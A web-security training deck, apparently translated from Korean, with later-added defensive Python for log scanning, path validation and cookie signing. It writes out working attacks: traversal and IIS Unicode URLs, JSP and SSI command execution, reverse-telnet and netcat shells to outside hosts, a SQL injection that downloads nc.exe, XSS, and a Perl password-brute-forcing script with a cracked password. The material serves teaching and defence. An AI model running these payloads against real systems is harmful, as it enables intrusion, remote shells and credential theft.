Web Security Vulnerabilities and Attack Techniques
Kim Jin-yeol (김진열)
Web Hacking
Contents
1. Web Security Overview
  1. Changes in the web environment
  2. Why web security is needed
  3. Limits of web security
2. Web Security Vulnerabilities and Attack Techniques
  1. Web server vulnerabilities and attack techniques
  2. Web application vulnerabilities and attack techniques
  3. Web browser vulnerabilities and attack techniques
3. Case Study
1. Web Security Overview
1.1 Changes in the Web Environment
[Figure: evolution of the web environment, from a simple information-sharing environment to the enterprise's critical information system environment, with services becoming more diverse, sophisticated and complex. Technology layers shown: HTML, XHTML, DHTML, XML; CGI, SSI, JavaScript, VBScript, ASP, PHP, JSP; Secure HTTP, SSL/TLS, SET; Web Services, J2EE, .NET.]
• Standard interface for information services
• Business enabler
• Simple information retrieval and information sharing tool
• Promotion medium for individuals and companies
• Web portals, web-based e-commerce, enterprise portals
1.1 Changes in the Web Environment
[Figure: web architecture. The web client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.), which returns an HTTP reply (HTML, JavaScript, VBScript, etc.). Web applications run as server plugins (Perl, C/C++, JSP, etc.) and reach the SQL database through a database connection (ADO, ODBC, etc.).]
1.2 Why Web Security Is Needed
― Growing web security threats
The spread of web-based information services and e-commerce creates more opportunities to obtain valuable information and direct financial gain.
With network security solutions deployed and network hardening in place, attackers' targets shift to the relatively weak web.
― Growing web security vulnerabilities
Expanding web server functionality to deliver better and more varied services increases the number of security holes.
The stateless nature of the HTTP protocol carries inherent structural security weaknesses.
1.3 Limits of Web Security
― Limits of the (packet filtering) firewall
Perimeter security solution: the HTTP port (80) is permitted
Layer 3-4 only: not the application layer
― Limits of intrusion detection systems (NIDS)
Detection only; false positives/negatives
Detection after the attack has happened: information is already leaked
Cannot detect attack patterns inside encrypted (SSL) packets
― Insufficient web browser security measures
Individual users can hardly remove security threats themselves and are directly exposed to illegal information collection, information leakage and malicious attacks.
2. Web Security Vulnerabilities and Attack Techniques
― URL Interpretation Attacks
[Figure: web client, web server, web applications and DB. Web server misconfiguration gives rise to URL interpretation attacks.]
2. Web Security Vulnerabilities and Attack Techniques
― Input Validation Attacks
[Figure: the same architecture. Poor checking of user inputs in the web applications gives rise to input validation attacks, on top of URL interpretation attacks.]
2. Web Security Vulnerabilities and Attack Techniques
― SQL Query Poisoning
[Figure: the same architecture. Input validation attacks that extend the SQL statements sent to the DB become SQL query poisoning, alongside URL interpretation attacks.]
2. Web Security Vulnerabilities and Attack Techniques
― HTTP Session Hijacking
[Figure: the same architecture. Reverse-engineering HTTP cookies on the client side leads to HTTP session hijacking and impersonation, alongside input validation attacks, SQL query poisoning and URL interpretation attacks.]
2.1 Web Server Vulnerabilities and Attack Techniques
― Security vulnerabilities in web server implementations
URL Parsing Error: IIS Unicode bug
Buffer Overflow
Source Code Disclosure: IIS "+.htr" bug, "showcode.asp"; WebLogic/WebSphere "*.JSP" bug
Web Architecture Attacks: Handler Forcing
No logs of POST request payloads or of HTTP headers (Referer:, User-Agent:, etc.)
(1) URL Parsing Error
― “.”, “..” and “...” Requests
― “%00” Requests
― Lots of “/” Requests
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
(1) URL Parsing Error
― IIS Unicode bug Exploit:
http://10.0.0.1/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
%c0%af = “/”
Can use HTTP POST to send multiple commands at a time to cmd.exe.
(2) Source Code Disclosure
― IIS "+.htr" bug: view the source code of ASP/ASA files.
A URL interpretation vulnerability:
http://10.0.0.1/global.asa+.htr
".htr" causes ISM.DLL to handle the URL.
Characters after the "+" sign (space) are ignored.
(2) Source Code Disclosure
― IIS "showcode.asp": bundled with the IIS samples in NT Option Pack 4.0.
Allows an attacker to view arbitrary files using the following URL:
http://10.0.0.1/msadc/showcode.asp?source=/msadc/../../../../../boot.ini
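As an added example (not part of the original slides), a small detector that runs over constructed access-log lines and flags the request patterns from these slides: traversal sequences, %00, the overlong %c0%af encoding behind the IIS Unicode bug, "+.htr" and "showcode.asp" requests, and an uppercase .JSP extension. The log lines and the rule names are assumptions made for the demonstration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed Common Log Format lines, not from the original slides.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2002:10:01:02 +0900] "GET /index.html HTTP/1.0" 200 1240
10.0.0.7 - - [12/May/2002:10:01:09 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512
10.0.0.7 - - [12/May/2002:10:01:15 +0900] "GET /global.asa+.htr HTTP/1.0" 200 2048
10.0.0.9 - - [12/May/2002:10:02:01 +0900] "GET /cgi-bin/lame.cgi?page=../../../../etc/motd%00html HTTP/1.0" 200 300
10.0.0.9 - - [12/May/2002:10:02:30 +0900] "GET /msadc/showcode.asp?source=/msadc/../../../../../boot.ini HTTP/1.0" 200 180
10.0.0.5 - - [12/May/2002:10:03:00 +0900] "POST /cgi-bin/guestbook.pl HTTP/1.0" 302 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# %c0%af is an overlong encoding of '/': lead bytes C0/C1 never occur in valid UTF-8.
OVERLONG_RE = re.compile(rb"[\xc0\xc1][\x80-\xbf]")


def classify(uri: str) -> list:
    """Name the slide's request patterns present in one request URI (empty list if none)."""
    raw = unquote_to_bytes(uri)            # decode to bytes so %00 and %c0%af stay visible
    path = uri.split("?", 1)[0]
    findings = []
    if b"\x00" in raw:
        findings.append("null byte")
    if b"../" in raw or b"..\\" in raw:
        findings.append("directory traversal")
    if OVERLONG_RE.search(raw):
        findings.append("overlong UTF-8 (IIS Unicode bug)")
    if path.lower().endswith("+.htr"):
        findings.append("+.htr source disclosure")
    if "showcode.asp" in path.lower():
        findings.append("showcode.asp sample file")
    if path.endswith(".JSP"):
        findings.append("uppercase .JSP extension")
    return findings


def scan_log(text: str) -> list:
    """Return (uri, findings) for every request line that matches at least one pattern.

    POST bodies are not in the access log (as the slides note), so only the request
    line is inspected; the POST entry in SAMPLE_LOG therefore produces no finding.
    """
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            findings = classify(m.group("uri"))
            if findings:
                hits.append((m.group("uri"), findings))
    return hits


if __name__ == "__main__":
    for uri, findings in scan_log(SAMPLE_LOG):
        print(uri, "->", ", ".join(findings))
```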
(2) Source Code Disclosure
― WebLogic / WebSphere “JSP” bug. Discovered by Shreeraj Shah, Foundstone.
Ability to retrieve source code of JSP/JHTML files.
Classic example of web server mis-configuration.
Using uppercase “JSP” in the URL causes the server to return unparsed JSP code.
(2) Source Code Disclosure
― How it works
[Figure: WebLogic request handling. The request index.JSP is resolved to the file index.jsp, but the uppercase extension does not match the *.jsp registration, so the default handler serves the file as-is instead of the jsp handler (process JSP tags, Java compiler, Java runtime). Registered handlers: html, shtml, jhtml, jsp, default.]
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
HTTP Request: index.JSP
(2) Source Code Disclosure
― URL prefixes for source code disclosure:
/servlet/file/ (IBM WebSphere)
/file/ (BEA WebLogic)
/*.shtml/ (BEA WebLogic)
/ConsoleHelp/ (BEA WebLogic)
/servlet/com.sun.server.http.servlet.FileServlet/ (Sun JavaWebServer)
Advisories on Foundstone’s advisories page: http://www.foundstone.com/advisories.htm
(3) Handler Forcing
― Web Architecture Attacks
Sometimes the way web servers are implemented can lead to vulnerabilities.
A common attack is to bypass the web server configuration directives and invoke built-in procedures directly.
A close look at the web server architecture can reveal holes.
(3) Handler Forcing
― Web Architecture
[Figure: web server handler architecture inside the Java runtime. The html handler returns .html files with a text/html header; the shtml handler processes SSI tags (#exec, #include), which can include a file or run /bin/sh; the jsp handler processes JSP tags, compiles them with the Java compiler into a class and runs it; the cgi handler runs scripts and executables (sh, perl, ...); the default handler serves everything else.]
(3) Handler Forcing
― Handler Forcing Vulnerability
Certain misconfigurations allow handlers to be forced onto files that are not supposed to be processed by them.
Forcing a default handler onto a CGI file can cause the contents of the CGI file to be returned "as-is".
Forcing a JSP handler onto an HTML file can cause the contents of the HTML file to be compiled by the Java compiler and executed by the Java run-time!
(3) Handler Forcing
― Sun Java Web Server: direct servlet invocation by the /servlet/ prefix.
Can force the PageCompile handler (servlet) on any file in the web document directory.
Files get compiled and executed as JSPs!
Discovered by Shreeraj Shah, Foundstone.
Exploit: http://10.0.0.2/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/path/to/file.html
(3) Handler Forcing
[Figure: the JSP PageCompile handler forced onto .html files. Instead of the html handler returning the file with a text/html header, the jsp handler processes the JSP tags, compiles them with the Java compiler into a class and executes it in the Java runtime.]
(3) Handler Forcing
• On NT:
• JSP code for invoking cmd.exe:
<%
String s = null, t = "";
try {
    Process p = Runtime.getRuntime().exec("cmd /c dir c: /w");
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = sI.readLine()) != null) { t += s; }
} catch (IOException e) {
    e.printStackTrace();
}
%>
<%=t %>
(3) Handler Forcing
• On Unix (if xterm is not present):
• JSP code for "Reverse Telnet":
<%
String s = null, t = "";
try {
    Process p = Runtime.getRuntime().exec("/bin/sh 'telnet 10.0.0.11 2000 | /bin/sh | telnet 10.0.0.11 2001'");
    BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
    while ((s = sI.readLine()) != null) { t += s; }
} catch (IOException e) {
    e.printStackTrace();
}
%>
<%=t %>
(4) HTTP Header Manipulation
― Web Server Fingerprinting: HTTP banner grabbing.
netcat as a TCP client (even telnet works):
nc 10.0.0.1 80
HEAD / HTTP/1.0
Advanced HTTP directives: TRACE, OPTIONS, etc.
2.1 Web Server Vulnerabilities and Attack Techniques
― Security vulnerabilities caused by web server misconfiguration
Information Disclosure: directory traversal; enumeration of sample files and backup/test files
HTTP Basic Authentication: brute force attack
SSI bug: Options Includes (#exec, #include)
(1) Information Disclosure
― Directory Browsing / Index Listings
Original location:
― http://www.foo.com/dir3/dir2/dir1/file.html
Try:
― http://www.foo.com/dir3/dir2/dir1/
― http://www.foo.com/dir3/dir2/
― http://www.foo.com/dir3/
― Tools: Whisker
― http://www.wiretrip.net/
(1) Information Disclosure
― File Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
(2) HTTP Basic Authentication
― HTTP Basic Authentication
Directory authentication on the web uses two files, .htpasswd and .htaccess.
htpasswd [-c] passwordfile username: creates the password file (.htpasswd)
Create the .htaccess file:
AuthName "staff area"
AuthType Basic
AuthUserFile /usr/local/etc/httpd/users
require valid-user
(2) HTTP Basic Authentication
― Weak Authentication
The password is transmitted between the client's browser and the web server without any encryption: the ASCII text is merely Base64-encoded before being sent.
Beyond authentication itself, no additional features such as other functions or restrictions are available.
Basic authentication information can be eavesdropped through sniffing.
The user's credentials are recovered from the eavesdropped information: Authorization: Basic bmFta2M6MTExMQ==
(3) SSI Bug
SSI (Server Side Includes) tags allow commands to be executed locally on the system via #exec tags.
Some applications save user inputs on a local file.
Malicious SSI tags can be uploaded via such applications.
The result: Remote Command Execution!
(3) SSI Bug
― guestbook.pl
― One of the many free CGI scripts available.
― Vulnerable on servers that parse .html files through SSI.
(3) SSI Bug
― Insert SSI tags as guestbook comments.
cat /etc/passwd; xterm &
(3) SSI Bug
― How it works
[Figure: the guestbook comment submitted through addguest.html is written by guestbook.pl into guestbook.html on the web server. The comment contains the SSI tag <!--#exec cmd="cat /etc/passwd; /usr/X11/bin/xterm -display 10.1.1.14:0.0", which is saved in guestbook.html as-is.]
(3) SSI Bug
― How it works
[Figure: .html files are registered to be parsed by mod_ssi, so when guestbook.html is requested the SSI tag <!--#exec cmd="cat /etc/passwd; /usr/X11/bin/xterm -display 10.1.1.14:0.0" is parsed and the command executed: the passwd file is returned and an xterm is started.]
2.1 Web Server Vulnerabilities and Attack Techniques
― Security vulnerabilities in web application implementations
Input Validation Error: unescaped special characters; file upload/remote execution vulnerability; SQL query poisoning/SQL injection
Information Disclosure: hard-coded information (ID/password, comments); hidden FORM field value manipulation; client-side script validation error
Cross-Site Scripting
(1) Unescaped special characters
― File Separator (;)
require "cgi-lib.pl";
$to = $in{'to'};
$subject = $in{'subject'};
$msg = $in{'msg'};
open(FILE, "|mail $to -s $subject");
print FILE $msg;
close(FILE);
Massively insecure:
Consider: http://xx.com/cgi-bin/[email protected];rm%20-rf%20*;
(1) Unescaped special characters
― Path/Directory Traversal (../)
require "cgi-lib.pl";
$message_id = $in{'message'};
$forum_dir = "./CgiDiscussion";
open(FILE, "$forum_dir/$message_id");
while (<FILE>) {
    print;
}
close(FILE);
Normally: http://xx.com/cgi-bin/bbs_forum.pl?message=1-2.msg
But consider: http://xx.com/cgi-bin/bbs_forum.pl?message=../../../etc/passwd
(1) Unescaped special characters
― More Path/Directory Traversal
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd
Double DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data....//....//....//etc/passwd
(1) Unescaped special characters
― Poisoning Null Byte (%00)
• The session id was tied to a file similar to the form [session_id].dat
• The input was validated to some degree: /^*.dat$/ (.dat exists at the end)
• When it came to opening and rewriting the file though, Perl's open() command was used.
• Perl's open command passed the filename to the operating system
• The problem is that OS system calls treat null bytes (\0) as ending the string, but Perl does not
• So although the file was being checked for validity by making sure it had a .dat suffix, the script was still vulnerable...
(1) Unescaped special characters
― Poisoning Null Byte (%00)
• Consider: http://x.com/cgi-bin/vulnerable.cgi?file=/etc/passwd%00.dat
• The file passes the Perl regex because it does end in .dat
• But the system call to open the file ends at /etc/passwd, allowing the user access!
(1) Unescaped special characters
― Double dots or not double dots...
• So a lot of people know to filter input so that directory traversal doesn't work...
• Or does it?
• if ($file =~ /\.\./) { die("Stop! Hacker!"); }
• Similar to the null byte attack, system calls may interpret things differently from what you expect...
• http://x.com/cgi-bin/vulnerable.cgi?file=\.\./.\.\/etc/passwd
• Note the literal \ in the URL. The Perl regex from before will not match it: /\.\./ just checks for literal periods.
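Added example, not from the original slides: the two checks the slides describe (a deny-list for ".." and a suffix test) next to a hardened version that rejects NUL bytes first, allow-lists the file name and confirms the canonical path stays under the forum directory. The directory, file names and request values are constructed for the demonstration.

```python
import os
import re
import tempfile
from typing import Optional

# Stand-in for the slide's ./CgiDiscussion directory (constructed, empty temp dir).
FORUM_DIR = tempfile.mkdtemp()
ALLOWED_NAME = re.compile(r"[A-Za-z0-9_-]+\.(msg|dat)")


def naive_check(name: str) -> bool:
    """The two checks from the slides as a deny-list: no '..' and a .dat/.msg suffix."""
    return ".." not in name and name.endswith((".dat", ".msg"))


def safe_forum_path(name: str, base_dir: str = FORUM_DIR) -> Optional[str]:
    """Return the canonical path of a forum message, or None if the request is rejected.

    Order matters: reject NUL bytes before anything looks at the suffix, allow-list the
    file name instead of searching for '..', and confirm the *canonical* path is still
    under base_dir so the operating system sees the same string the check saw.
    """
    if "\x00" in name:                      # the %00 trick: the OS would stop at the NUL
        return None
    if not ALLOWED_NAME.fullmatch(name):    # '\', '/', '..' and odd encodings all fail here
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:   # defence in depth (symlinks etc.)
        return None
    return candidate


def compare(name: str) -> tuple:
    """(naive_check verdict, hardened verdict) for one request value."""
    return naive_check(name), safe_forum_path(name) is not None


# Constructed request values modelled on the slides' URLs
REQUESTS = [
    "1-2.msg",                        # the normal case
    "/etc/passwd\x00.dat",            # null byte poisoning
    "../../../etc/passwd",            # plain dot-dot-slash
    "\\.\\./.\\.\\/etc/passwd.dat",   # backslash-escaped dots that /\.\./ never matches
]

if __name__ == "__main__":
    for r in REQUESTS:
        print(repr(r), compare(r))
```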
(2) File Upload/Remote Execute
1) PHP Script File Upload
(2) File Upload/Remote Execute
2) Remote CMD Execution Using PHP Script
aaa.php?cmd=/usr/X11R6/bin/xterm%20-display%20192.168.192.2:0
(2) File Upload/Remote Execute
3) Gain a nobody & root shell by a BOF exploit
Buffer overflow in hanterm, which has the set-UID (root) bit set
(3) SQL Query Poisoning
― Poor input validation on parameters passed to SQL queries can be disastrous.
― For example:
Dim sql_con, result, sql_qry
Const CONNECT_STRING = "Provider=SQLOLEDB;SERVER=WEB_DB;UID=sa;PWD=xyzzy"
sql_qry = "SELECT * FROM PRODUCT WHERE ID = " & Request.QueryString("ID")
Set sql_con = Server.CreateObject("ADODB.Connection")
sql_con.Open CONNECT_STRING
Set result = sql_con.Execute(sql_qry)
(3) SQL Query Poisoning
― Return all rows: http://10.0.0.3/showtable.asp?ID=3+OR+1=1
― Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 OR 1 = 1
(3) SQL Query Poisoning
― Drop table: http://10.0.0.3/showtable.asp?ID=3%01DROP+TABLE+PRODUCT
― Resultant query: SELECT * FROM PRODUCT WHERE ID = 3 DROP TABLE PRODUCT
(3) SQL Query Poisoning
― Remote command execution! http://10.0.0.3/showtable.asp?ID=3%01EXEC+master..xp_cmdshell+'tftp+-i+10.0.0.13+GET+nc.exe+%26%26+nc+-e+cmd.exe+10.0.0.11+2000'
― Command executed: tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000
(3) SQL Query Poisoning
― How it works
[Figure: (1) the web browser sends the poisoned request to the ASP page on IIS 4.0, and the DB runs SELECT * FROM PRODUCT WHERE ID=3 EXEC master..xp_cmdshell 'tftp -i 10.0.0.13 GET nc.exe && nc -e cmd.exe 10.0.0.11 2000'; (2) a tftp server transfers nc.exe over to the NT IIS box; (3) a listener at port 2001 receives the connection and the attacker gets a C:\> prompt.]
(4) Hidden FORM value manipulation
― Price shown on the product page: $129.95
(4) Hidden FORM value manipulation
― <input type=“hidden” name=“Price” value=“129.95”>
(4) Hidden FORM value manipulation
― <input type=“hidden” name=“Price” value=“1.95”>
(4) Hidden FORM value manipulation
― $1.95
2.2 Web Browser Vulnerabilities and Attack Techniques
HTTP Session Hijacking: Cookie Poisoning
Cross-site scripting: hyperlink, frame and window spoofing; cookie stealing
Denial of service: hostile & annoying applets; malicious JavaScript
Other: social engineering attacks, exploiting users who faithfully follow the instructions shown in the web browser
(1) HTTP Session Hijacking
― Cookie overview
Session information stored on the web client side (< 4KB)
Background: the connectionless (= stateless) nature of the HTTP protocol makes transaction handling difficult.
― Cookie structure
Set-Cookie: name=value; expires=[Date]; domain=[Domain]; path=[Path]; [secure]
― Cookie applications: web site visit history, user authentication (id/passwd), storing e-commerce (shopping cart) transaction information
― Cookie security issues
Invasion of personal privacy: illegal collection of personal information
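Added example, not from the original slides: one server-side defence against cookie poisoning, an HMAC-signed cookie value emitted in the Set-Cookie layout shown above and verified when the cookie comes back. The key, cookie name, domain and value are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie
from typing import Optional

# Constructed server-side secret; a real deployment loads it from protected configuration.
SERVER_KEY = secrets.token_bytes(32)


def sign(value: str, key: bytes = SERVER_KEY) -> str:
    """Append an HMAC-SHA256 tag so the server can tell its own cookie from an edited one."""
    tag = hmac.new(key, value.encode(), hashlib.sha256).digest()
    return value + "." + base64.urlsafe_b64encode(tag).decode().rstrip("=")


def verify(signed: str, key: bytes = SERVER_KEY) -> Optional[str]:
    """Return the original value if the tag matches, None for a missing or forged tag."""
    value, sep, tag = signed.rpartition(".")
    if not sep or not tag.isascii():
        return None
    expected = sign(value, key).rpartition(".")[2]
    return value if hmac.compare_digest(expected, tag) else None


def build_set_cookie(name: str, value: str, domain: str, path: str = "/") -> str:
    """Set-Cookie header in the slide's layout, with Secure and HttpOnly added."""
    jar = SimpleCookie()
    jar[name] = sign(value)
    jar[name]["domain"] = domain
    jar[name]["path"] = path
    jar[name]["secure"] = True
    jar[name]["httponly"] = True
    return jar.output(header="Set-Cookie:")


def tamper(signed: str, new_value: str) -> str:
    """What cookie poisoning does: change the value, keep the old tag."""
    return new_value + "." + signed.rpartition(".")[2]


if __name__ == "__main__":
    header = build_set_cookie("session", "1234:user", "shop.example")
    print(header)
    cookie_value = header.split("session=", 1)[1].split(";", 1)[0]
    print("genuine  ->", verify(cookie_value))
    print("poisoned ->", verify(tamper(cookie_value, "1234:admin")))
```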
(1) HTTP Session Hijacking
― Cookie Poisoning
(2) XSS(Cross-Site Scripting)
― Click to Execute: the user must click on a link to execute the script (search fields, 404 errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert('JavaScript Launched');</SCRIPT>
― Mass Injection: all users viewing the page execute the script (guest books, message boards)
Post a JavaScript onto a board
Message: <SCRIPT>alert('JavaScript Launched');</SCRIPT>
(2) XSS(Cross-Site Scripting)
― Directed Injection: as soon as the user loads the page, the script executes (webmail, HTML mail, messaging)
Send an email with: HELLO <SCRIPT>alert('JavaScript Launched');</SCRIPT>
― Holding the door open (feedback, profile pages, anything persistent...)
Load an HTML page with sourced scripts: <LAYER SRC="javascript.js"></LAYER>
3. Case Study
1. The Worldcup Ticketing
2. Inappropriate Board Administration
3. Tomcat Web Server Vulnerability
4. Weak User Authentication
3.1 The Worldcup Ticketing
(1) A look at a glance...
(2) View and analyze the HTML source
(3) Get the ticketing HTML template
(4) Success! "Dreams come true" (꿈은 이루어진다)
3.2 Inappropriate Board Admin
― Information gathering
RPC: not reachable from outside
SNMP: not reachable from outside
XDM: XDMCP over UDP (177/UDP) appears to be open, but the outbound 6000-6063/TCP range appears to be blocked, so an actual connection is not possible
Apache Web Server: Apache 1.3.6 was running on TCP/80, and JRun was confirmed to be running as the JSP engine.
3.2 Inappropriate Board Admin
― Vulnerability Analysis
TCP connections are impossible except to the ranges opened in a specific ACL
Apache was running on 80/tcp, where the web server operates; no known vulnerabilities were found.
JRun's default page existed, but the related default servlets and pages did not.
Port 8081/tcp was open, but whether it was the JRun port or some other port could not be determined
Multiple vulnerabilities were found in the web service pages
3.2 Inappropriate Board Admin
― Attack Scenario
Accessing the web server's / directly shows only JRun's default page, so the actual internal content cannot be identified; instead, try to find vulnerable web services by checking URL paths in the site maps of other servers
Attempt the attack with server-side script uploading, the most widely used web server attack method and a major issue in web server security
3.2 Inappropriate Board Admin
― Attack: JRun default page. The JRun default page exists in the / directory, but no sample servlet pages exist.
3.2 Inappropriate Board Admin
Admin board without authentication found
― Searched for the URLs existing on the BBS using the sitemap pages of neighbouring servers (homepage source analysis).
― Among them, the admin1.jsp page under /jsp/Notify/news and /jsp/Notify/research was found by guessing.
[Figure: Internet, the BBS, and other web pages]
3.2 Inappropriate Board Admin
JSP Upload
― No board allowing ordinary users to upload files was found; the admin board was found by guessing URLs.
― Using jsp/Notify/research/admin1.jsp, a JSP file containing code that executes internal commands was uploaded.
― Because the JSP engine runs with root privileges, internal commands can be executed as root.
3.2 Inappropriate Board Admin
― JSP File Upload & Remote Execute
3.2 Inappropriate Board Admin
― Successful! Port binding shell
― To obtain a shell directly, the port-binding tool netcat was uploaded and, using the uploaded JSP, bound to a port so that the shell could be accessed directly.
― An unused port among ports 8080-8600, which are open in the ACL, was used.
― Executed from the uploaded hacker.jsp:
/tmp/h4ckers/nc -l -p 8150 -e /bin/sh
― Connect from the operator's client to that port:
(client)$ nc bbs.target.com 8150
id
uid=0(root) gid=1(other)
3.3 Tomcat Vulnerability
― Port Scanning
nmap -P0 -sS 192.168.192.100
Port  State  Protocol  Service
7     open   tcp       echo
9     open   tcp       discard
13    open   tcp       daytime
19    open   tcp       chargen
21    open   tcp       ftp
23    open   tcp       telnet
25    open   tcp       smtp
80    open   tcp       http
111   open   tcp       sunrpc
443   open   tcp       https
891   open   tcp       unknown
1428  open   tcp       informatik-lm
1429  open   tcp       nms
8080  open   tcp       http-proxy
3.3 Tomcat Vulnerability
― Gathering the information
― Analyze the information
telnet 192.168.192.100 80
Trying ....
HEAD / HTTP/1.0
....
Sendmail 8.9.3 (PHNE_18979)/8.7
Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java HP-UX Java)
HP-UX B.10.20 PA-RISC
3.3 Tomcat Vulnerability
― BugTraq: Jakarta-tomcat.../admin
3.3 Tomcat Vulnerability
― Trying to attack the vulnerabilities.
3.3 Tomcat Vulnerability
― Add new context…
3.3 Tomcat Vulnerability
― http://target.com:8080/ttest/
3.3 Tomcat Vulnerability
― Results
Get the system passwd file: http://www.target.com:8080/ttest/etc/passwd
Get the database passwd: http://www.target.com:8080/ttest/data1/cmwhome/tools/dba/ora_passecmwdbuser/ecmwdbpwd
3.4 Weak User Authentication
― Network Map
[Figure: the attacker on the Internet reaches web server #1 and web server #2 (IBM HTTP 1.3.2.1/Apache 1.3.2). Port table (port number / service / TCP state / remarks): 25 SMTP (RMS service); 53 DNS (N/A); 80 HTTP open; 443 SSL/HTTPS closed (N/A); all UDP services. Result: almost all ports are open.]
3.4 Weak User Authentication
A. JSP source file download & analysis
― Using the redir-2.2.1 program (http://sammy.net/~sammy/hacks), we connected to the target server and were able to view and download the source of every JSP file on the web server needed for the attack.
― During the attack, analysis of the JSP source files revealed the web server's directory structure and was used to analyse the data and data formats exchanged between the web applications.
3.4 Weak User Authentication
― Port redirect using redir.
3.4 Weak User Authentication
― JSP File Download
3.4 Weak User Authentication
― B. Board administrator information exposed
Through the homepage of a neighbouring server (http://2XX.1XX.5X.2XX), the URLs of the board administrator pages were obtained, along with the administrator information (administrator name, login ID, etc.) of each board.
3.4 Weak User Authentication
― Administrator information (name/ID, etc.) obtained
3.4 Weak User Authentication
― C. Use of passwords that are easy to guess or easy to crack
By analysing the source code of the file http://2xx.1xx.5x.5x/xxx/adm/index.jsp we obtained information about the password composition: passwords consist of digits and lowercase and uppercase letters, and are at most 9 characters long.
3.4 Weak User Authentication
We attempted to crack the password using wwwhack (http://www.wwwhack.com, not available any more), a password cracking program for HTTP-FORM based user authentication.
3.4 Weak User Authentication
― Brute Force Attack
Because the authentication handling inside the file http://2xx.1xx.5xx5/xxx/adm/indexxxx.jsp differs from that of an ordinary HTML web page, the password crack using wwwhack failed.
3.4 Weak User Authentication
― A password cracking program was written in the Perl scripting language so that the crack could be run in text mode
#!/usr/bin/perl
use Socket;

$protocol = getprotobyname('tcp');
$address  = inet_aton($ARGV[0]);
$port     = $ARGV[1];
$remote   = sockaddr_in($port, $address);
$id       = $ARGV[2];
print STDOUT "start...\n";

open(PWD, "<password.txt");
$i = 0;
$crack = "no";
while ($pwd = <PWD>) {
    $pwd =~ s/\n//;
    $i = $i + 1;
    print STDERR "Trying($i) : $id/$pwd\n";
    &crack;
    goto END if ($crack eq "yes");
}
END:
close(PWD);
exit(0);

sub crack {
    socket(NOC, &PF_INET, &SOCK_STREAM, $protocol) or die "can't create socket\n";
    setsockopt(NOC, SOL_SOCKET, SO_REUSEADDR, 1);
    connect(NOC, $remote) or die "can't connect to $ARGV[0]\n";
    $message = "GET /isw/adm/indexmanag.jsp?id=$id&pwd=$pwd HTTP/1.0\n\n";
    send(NOC, $message, 0);
    vec($rt, fileno(NOC), 1) = 1;
    while (!select($r = $rt, undef, undef, 0.00001)) { }
    $input = "";
    while (1) {
        $error = "no";
        recv(NOC, $readin, 1, 0) || undef $error;
        if (!$error) { goto OK; }
        goto OK if ($readin eq "");
        $input = $input . $readin;
        if ($readin eq "\n") {
            if (index($input, "index.jsp") ne -1) {
                print STDERR "**************************************************\n";
                print STDERR "******** Password Found Successfully ! ***********\n";
                print STDERR "**************************************************\n";
                print STDOUT "ID=$id, PASSWORD=$pwd\n";
                $crack = "yes";
                goto OK;
            }
            $input = "";
        }
    }
    SUCCESS:
    close(NOC);
    if ($crack eq "yes") { return; }
    OK:
    close(NOC);
}
3.4 Weak User Authentication
― Password crack result
3.4 Weak User Authentication
― Logged in successfully as board administrator
3.4 Weak User Authentication
― Joy, then sorrow!
We logged in with the board administrator's ID and could modify and delete the posts on the board, but the board had no file upload function and its settings could not be changed.
Start again: attempt to crack the super-administrator password
3.4 Weak User Authentication
― Retry: cracking the super-administrator password
ID=193930086, PASSWORD=happy
3.4 Weak User Authentication
― Logged in as super-administrator & board management
3.4 Weak User Authentication
― Board posting and file upload
3.4 Weak User Authentication
― Creating a new board (with file upload enabled)
3.4 Weak User Authentication
― JSP File Upload
3.4 Weak User Authentication
― Success, but failed.
3.4 Weak User Authentication
― Last chance, but…
3.4 Weak User Authentication
― Learn from ...
used an old (unpatched) web server
misconfiguration
inappropriate server administration
inappropriate ID/Passwd management
4. Web Security Countermeasures
5. Conclusion
― What on earth makes it insecure? Technology itself.
Hackers, malicious users
Its Application.
People who make, use and manage it.
― So then, what makes it secure? Firewall, IDS, and ...
Secure Programming
Management: Plan-Do-Check-Action